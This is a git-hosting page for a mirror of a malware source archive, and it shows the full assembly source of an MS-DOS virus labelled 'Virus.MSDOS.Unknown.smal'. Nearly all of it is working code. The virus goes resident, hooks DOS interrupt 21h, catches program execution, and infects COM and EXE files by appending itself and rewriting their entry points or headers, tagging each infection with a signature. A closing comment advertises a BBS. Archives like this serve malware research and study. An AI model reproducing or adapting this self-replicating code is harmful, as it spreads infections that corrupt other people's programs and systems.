ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
c0f3c65be3
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.smal.asm
vxunderground 5dd4938a52
Add files via upload
2021-01-12 17:58:25 -06:00

231 lines
3.6 KiB
NASM
Raw Blame History

virus segment public 'code'
assume cs:virus,ds:virus,es:virus
org 0
VirusSize equ VirusEnd-$
Com: call Begin
call Label2
PartPage equ this word+02h
PageCount equ this word+04h
HdrSize equ this word+08h
MinMem equ this word+0ah
MaxMem equ this word+0ch
ExeSS equ this word+0eh
ExeSP equ this word+10h
ExeSignature equ this word+12h
ExeStart equ this dword+14h
ExeIP equ this word+14h
ExeCS equ this word+16h
SavedCode:
mov ax,4c00h
int 21h
org SavedCode+18h
Label2: pop si
mov di,100h
push di
movsw
movsw
movsb
ret
Exe: call Begin
mov dx,ds
add dx,10h
add cs:ExeCS,dx
add dx,cs:ExeSS
mov ss,dx
mov sp,cs:ExeSP
jmp cs:ExeStart
Begin: push ds
push es
push ax
xor ax,ax
mov ds,ax
mov ds,ds:[46ah]
cmp Signature,0ACDCh
je Exit
mov ah,4ah
mov bx,-1
int 21h
sub bx,(VirusSize+1fh)/10h+1000h
jb Exit
add bh,10h
mov ah,4ah
int 21h
mov ah,48h
mov bx,(VirusSize+0fh)/10h
int 21h
jb Exit
dec ax
mov es,ax
inc ax
mov es:[1],ax
mov es,ax
push cs
pop ds
call Label1
Label1: pop si
sub si,offset Label1
xor di,di
push di
mov cx,VirusSize
rep movsb
pop ds
mov ax,ds:[84h]
mov word ptr es:OldInt21[0],ax
mov ax,ds:[86h]
mov word ptr es:OldInt21[2],ax
mov byte ptr ds:[467h],0eah
mov word ptr ds:[468h],offset NewInt21
mov ds:[46ah],es
mov word ptr ds:[84h],7
mov word ptr ds:[86h],46h
Exit: pop ax
pop ds
pop es
ret
Header db 0e9h
dw 0
Signature dw 0ACDCh
NewInt21:
cmp ah,4bh
je Exec
jmp short EOI
Exec: push ax
push bx
push cx
push dx
push ds
mov ax,3d02h
call Interrupt
jc short Error
push cs
pop ds
mov bx,ax
mov ah,3fh
mov cx,18h
mov dx,offset SavedCode
call DOS
cmp word ptr cs:SavedCode,5a4dh
je ExeFile
ComFile:cmp word ptr cs:SavedCode[3],0ACDCh
je short Close
mov al,02h
call Seek
or dx,dx
; jmp short Close
cmp ah,0f6h
je short Close
sub ax,5
; jmp short Close
inc ax
inc ax
mov word ptr ds:Header[1],ax
mov ah,40h
mov cx,VirusSize
xor dx,dx
call DOS
mov al,00h
call Seek
mov ah,40h
mov cx,5
mov dx,offset Header
call Interrupt
Close: mov ah,3eh
call Interrupt
Error: pop ds
pop dx
pop cx
pop bx
pop ax
EOI: db 0eah ; jmp 0:0
OldInt21 dd 026b1465h
ExeFile:cmp ExeSignature,0ACDCh
je short Close
mov al,02h
call Seek
add ax,0fh
adc dx,0
and al,0f0h
xchg ax,dx
mov cx,ax
mov ax,4200h
call DOS
mov cx,10h
div cx
or dx,dx
jne Close
mov dx,ax
sub dx,HdrSize
push dx
mov cx,10h
mul cx
add ax,VirusSize
adc dx,0
mov cx,200h
div cx
inc ax
push ax
push dx
mov ah,40h
mov cx,VirusSize
xor dx,dx
call Interrupt
pop PartPage
pop PageCount
pop ax
jc Close
mov ExeCS,ax
mov ExeIP,offset Exe
add ax,(VirusSize+0fh)/10h
mov ExeSS,ax
mov ExeSP,200h
cmp MinMem,20h
jae Mem1
mov MinMem,20h
Mem1: cmp MaxMem,20h
jae Mem2
mov MaxMem,20h
Mem2: mov al,00
call Seek
mov ah,40h
mov cx,18h
mov dx,offset SavedCode
call Interrupt
jmp Close
Seek: mov ah,42h
xor cx,cx
xor dx,dx
DOS: call Interrupt
jnc Ok
pop ax
jmp Close
Interrupt:
pushf
call cs:OldInt21
Ok: ret
VirusEnd equ $
virus ends
end
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue View Git Blame Copy Permalink